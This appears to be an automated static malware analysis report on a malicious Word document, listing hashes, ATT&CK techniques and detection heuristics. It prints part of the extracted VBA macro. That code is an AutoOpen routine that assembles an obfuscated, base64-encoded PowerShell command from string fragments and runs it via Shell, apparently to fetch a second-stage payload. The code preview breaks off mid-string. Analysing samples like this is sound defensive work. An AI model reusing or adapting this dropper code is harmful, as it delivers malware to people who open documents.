Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 58e73fbb2fc052d5…

MALICIOUS

Office (OLE)

Size: 100.2 KB
Created: 2018-06-07 19:00:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 0a2d18361a75b4a4f570ff81ceca56c9
SHA-1: d99ca07267d73def9b54e50e2f2bb09b30ce78f8
SHA-256: 58e73fbb2fc052d540205651b976a1fe122038838d090ba21c6552fe133a3af6
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the execution of a Shell command, which in turn invokes PowerShell. The PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection and multiple VBA heuristics further support its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6576939-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6576939-0
  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11154 bytes
SHA-256: 95f49c63799f2037546fefcf9a661783d9f8f07de1c013089822e8084fb15b28

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "LtKlPkqfFiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iiRcij()
On Error Resume Next
GWjHMz = Tan(BCzBz _
* Tan(RpiAqM * Int(FcBztK * Sqr(64831) / HwAsn + Fix(76299)) / 75959 * Round(63821 / Log(99204 - MYnYbh) + 15255 - EXkjGS)) _
/ 96448 + Log(86918))
iUjNBR = Tan(uDwILD _
* Tan(HiWinF * Int(AUsHGK * Sqr(58541) / riuuu + Fix(17516)) / 23541 * Round(36807 / Log(29491 - GuiXi) + 99740 - AucEj)) _
/ 77876 + Log(19754))
iiRcij = hjLLpJ + Shell(maKSBsKQ + Chr(XRhdJtHHHSc + vbKeyP + ZioGSLw) + AXkMLDIHDqs + hftlIFj + SJWTAN + wTSWNpT + VpiwVGXOVWL, 74714 - 74714)
NdAoFv = Tan(PWMQN _
* Tan(JUvLH * Int(hLCdm * Sqr(84910) / GPBTHt + Fix(70275)) / 14339 * Round(63399 / Log(60540 - iJPwi) + 15359 - SmIqZ)) _
/ 63834 + Log(86237))
End Function
Sub Autoopen()
On Error Resume Next
VcbKAN = Tan(XprNDE _
* Tan(cJcoj * Int(wDijuR * Sqr(38862) / ZPqUa + Fix(60668)) / 46772 * Round(14910 / Log(61894 - iwila) + 12703 - EHvJw)) _
/ 26760 + Log(70608))
iiRcij
LdRtuQ = Tan(tqwZBt _
* Tan(YwUdGK * Int(wMdcPp * Sqr(19543) / vbBFW + Fix(27974)) / 3027 * Round(12674 / Log(26692 - FvErnA) + 9344 - bizoU)) _
/ 13887 + Log(51206))
End Sub

Attribute VB_Name = "NRoRibZU"
Function AXkMLDIHDqs()
On Error Resume Next
XtrvwE = Tan(iQjYc _
* Tan(pziqb * Int(DajpU * Sqr(45441) / PVQVM + Fix(3032)) / 73831 * Round(79260 / Log(52949 - YbbAG) + 6422 - WLYPjD)) _
/ 37635 + Log(58143))
fLmpdZzVFZk = "owersHeLL" + " -e LgAgAC" + "gAIAAkAFM" + "ASA" + "BFAGwAbABpAEQ" + "AWwAx" + "AF0AKwAkAH" + "MASABlAEwA" + "TABJAGQAWwA" + "xADMAXQArACcAWA"
mLYoEW = Tan(qpjSv _
* Tan(XqTNo * Int(OzMzW * Sqr(87877) / JwriS + Fix(94301)) / 83477 * Round(66697 / Log(29696 - QnGBEk) + 21842 - luAni)) _
/ 91443 + Log(36286))
GIfhDNBtji = "An" + "ACk" + "AKAAgA" + "E4A" + "RQBXAC0A" + "Tw" + "BiAGoAR" + "QBDAHQAIAAgA" + "Gk" + "AbwAu"
NPiZO = Tan(ulNYz _
* Tan(OUDnH * Int(DahFK * Sqr(28900) / XlzSV + Fix(31358)) / 92977 * Round(30505 / Log(5448 - bEqLOs) + 39700 - flELQq)) _
/ 23940 + Log(61215))
SAuVmsArIB = "AEMATwBNAHAAUg" + "BFA" + "HMAcwBpA" + "E8AbgAuAEQAZQBG" + "AE"
sshIF = Tan(YrQvT _
* Tan(ICqLlb * Int(REoiNR * Sqr(58978) / wLVIGp + Fix(95204)) / 7839 * Round(45320 / Log(41477 - WoRTww) + 2798 - XiNzfO)) _
/ 55445 + Log(26804))
BCfnbKA = "wAYQB0A" + "GUA" + "cwBUAFIAZQBB" + "AE0AKABbA" + "EkAbwAuAG0A" + "ZQBNAE8AUg"
DKTqa = Tan(bjunNC _
* Tan(wTqKF * Int(zkqlLV * Sqr(14168) / iMqtdb + Fix(67305)) / 1022 * Round(26048 / Log(3165 - wCqnDJ) + 77502 - MkuJUJ)) _
/ 65161 + Log(26846))
MqtGsmbIj = "B5AFMA" + "dABSAEUAYQBNA" + "F0AIABbAGMATwB" + "OAHYAZQ" + "BSAHQAXQA" + "6ADoARgB"
NYIUTr = Tan(TEujab _
* Tan(FoZIsJ * Int(mcXcuK * Sqr(77470) / VjvNF + Fix(75671)) / 79128 * Round(87707 / Log(29764 - KzTwPE) + 36490 - moUvAp)) _
/ 8638 + Log(62624))
UKEzAGzzG = "yAG8ATQB" + "CAGEAc" + "wBlADYAN" + "ABTAFQAcgBJAG" + "4ARwAoACAAJwBW" + "AFoAQ"
wksYhE = Tan(jKoMW _
* Tan(QvKfh * Int(dnNTJ * Sqr(19964) / ziZiF + Fix(18034)) / 47353 * Round(25039 / Log(86691 - WEdtC) + 30427 - PGNbY)) _
/ 49214 + Log(71844))
MzNwCzIWV = "gBiAFQAOABKAEE" + "ARQB" + "JAFgALwB5A" + "GoANAAwAGEAU" + "gB0AG" + "gAQwB3AEkA"
AXkMLDIHDqs = fLmpdZzVFZk + GIfhDNBtji + SAuVmsArIB + BCfnbKA + MqtGsmbIj + UKEzAGzzG + MzNwCzIWV
End Function
Function hftlIFj()
On Error Resume Next
IsCmi = Tan(iNJEi _
* Tan(ciDwz * Int(lnaER * Sqr(51952) / IDDww + Fix(52269)) / 16999 * Round(77976 / Log(25884 - QVaKro) + 82797 - oUGcj)) _
/ 6303 + Log(30384))
UhVjiJuVzc = "RwBhAFU" + "AegBRAHEAZwBtAG" + "cAUgByAG4" + "ANQB" + "ZAG0ASw" + "AyADIANgBG" + "AFgAZAB" + "wAHY"
AnwuDb = Tan(OaNfRM _
* Tan(ZUOkmc * Int(Ntzjk * Sqr(55758) / RfWzj + Fix(36301)) / 50798 * Round(40580 / Log(81287 - tptMj) + 58103 - ZGLul)) _
/ 27194 + Log(92258))
tsYfFh = "AZABnAFYA" + "SQ" + "BJAC8AOQ" + "AxA" + "HkAVABYAHkAWgB" + "aAE" + "8AWQA3AEoAegBOA" + "G4A
... (truncated)